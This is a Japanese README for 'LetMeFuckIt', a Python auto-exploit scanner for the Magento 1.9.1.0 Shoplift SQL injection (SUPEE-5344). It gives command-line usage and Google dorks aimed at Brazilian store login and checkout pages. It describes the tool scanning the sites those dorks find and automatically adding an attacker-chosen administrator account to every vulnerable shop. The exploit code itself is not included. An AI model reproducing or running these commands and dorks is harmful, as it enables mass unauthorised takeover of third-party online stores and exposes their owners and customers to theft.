
Magento 1.9 用スキャナーおよびエクスプロイト
Magento用スキャナーおよびエクスプロイト
このスキャナーは、Magentoの SQLi脆弱性(1.9.1.0 CE) を悪用します。
この脆弱性は パッチSUPEE-5344 で修正されましたが、このスキャナーはセキュリティパッチを適用していないシステムを特定しテストするために使用されます。
LetMeFuckItはPythonで書かれており、以下のライブラリを使用しています:
pygoogle, argparse, urllib2, requests, base64
letmefuckit.py --dork <dork> --pages <number> --user <user> --pwd <pass>
letmefuckit.py --dork "inurl:customer/account/login/ site:com.br" --pages 4 --user adm --pwd pass
--dork --user --pwd --pages --help
"inurl:/customer/account/login site:com.br"
"inurl:/checkout/onepage/ site:com.br"
入力されたdorkを使用してGoogleでスキャンが行われ、URLはurls.txtファイルに保存され、その後自動的にテストされます。
実行時に指定されたユーザーは、脆弱なサイトの管理者として自動的に追加されます。
以下のエラーが発生した場合、スキャナーがpygoogleライブラリを使用しているためです。このライブラリはGoogleの新しいAPIシステムに対応しておらず、APIを使用するにはキーが必要になりました。
pygoogle ERROR __search__| responseDetails : Suspected Terms of Service Abuse. Please see http://code.google.com/apis/errors
エラーが表示された場合は、1〜2分お待ちください。スキャナーは正常に戻ります。
Exploit: Magento Shoplift exploit (SUPEE-5344) by Manish Kishan Tanwar AKA error1046 in 25/08/2015
LetMeFuckIt Scanner AutoPwned por OntheFrontLine in 27/09/2015